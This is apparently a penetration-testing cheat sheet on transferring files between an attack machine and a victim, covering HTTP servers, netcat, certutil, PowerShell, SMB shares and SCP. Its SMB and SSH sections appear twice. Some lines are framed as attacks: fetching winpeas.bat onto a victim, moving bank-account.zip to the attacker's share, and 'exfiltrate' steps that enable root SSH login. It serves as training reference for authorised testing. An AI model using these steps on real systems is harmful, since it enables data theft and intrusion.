File Transfers

Linux and Windows file transfers

Python HTTP Server

Python Simple HTTP Server is a straight forward process:exit: Ctrl+↩

# Hosting Machine
python -m SimpleHTTPServer

# Connecting Machine:
curl -o output.txt http://IP_Address:portnumber/filename.txt
#or
wget http://IP_Address:portnumber/filename.txt

Port number for connection can be specified by appending it to the end of the command, like so:

"python -m SimpleHTTPServer 80"‌

Netcat

# receiving/listening:
nc -l -p 4444 > outfile.txt

# sending/connecting:
nc -w 3 DEST_IP_ADDRESS 4444 < sendfile.txt

‌CertUtil

certutil -urlcache -split -f "http://IP_ADDRESS:8000/winpeas.bat" winpeas.bat
# or
certutil -urlcache -split -f "http://IP_ADDRESS:PORT/sourcefile.txt" NamedOutFile.txt

‌Powershell

powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

‌Setting up SMB Server

#From attack machine:
sudo python smbserver.py TMP /tmp  # you can use another folder than tmp

#move file to /tmp
cp whoami.exe /tmp/whoami.exe

#For windows:
#from victim machine:
copy \\192.168.119.134\tmp\whoami.exe


# from victim machine, to list SMB contents:
dir \\192.168.119.134\TMP

# from victim machine to put file on attacking machine's SMB share:
move bank-account.zip \\192.168.119.134\TMP

# SMBv1 might be depreciated on newer windows.  Try this to allow it:
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

SSH transfers to Attack Machine (exfiltrate)

Ensure OpenSSH is available on Kali machine with:
Create a new user that can access SSH locally, so that you do not have to enter your credentials on the victim machine.

apt list openssh-server

Edit the /etc/ssh/sshd_config file like so:

FROM:
#PermitRootLogin prohibit-password

TO:
PermitRootLogin yes

Stop and Stop SSH:

systemctl start ssh.socket

systemctl stop ssh.socket

Using SCP to copy files over SSH.

#from victim machine, after following the above steps to enable SSH:
scp PATH_TO_LOCALFILE USER@DEST_IP:/file/path/for/newfile 

#example
scp -r ./crossfile kali@192.168.119.101:/home/kali/crossfilefires

Invoke Web Request (HTTP request like curl)

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"

PreviousInitial Enumeration NextWriting /etc/passwd

Last updated 4 years ago

Was this helpful?

#From attack machine: sudo python smbserver.py TMP /tmp # you can use another folder than tmp #move file to /tmp cp whoami.exe /tmp/whoami.exe #For windows: #from victim machine: copy \\192.168.119.134\tmp\whoami.exe # from victim machine, to list SMB contents: dir \\192.168.119.134\TMP # from victim machine to put file on attacking machine's SMB share: move bank-account.zip \\192.168.119.134\TMP # SMBv1 might be depreciated on newer windows. Try this to allow it: Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

SSH transfers to Attack Machine (exfiltrate)

Ensure OpenSSH is available on Kali machine with:

Create a new user that can access SSH locally, so that you do not have to enter your credentials on the victim machine.

apt list openssh-server

Edit the /etc/ssh/sshd_config file like so:

FROM:
#PermitRootLogin prohibit-password

TO:
PermitRootLogin yes

Stop and Stop SSH:

systemctl start ssh.socket

systemctl stop ssh.socket

Using SCP to copy files over SSH.

#from victim machine, after following the above steps to enable SSH:
scp PATH_TO_LOCALFILE USER@DEST_IP:/file/path/for/newfile 

#example
scp -r ./crossfile kali@192.168.119.101:/home/kali/crossfilefires

Invoke Web Request (HTTP request like curl)

Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"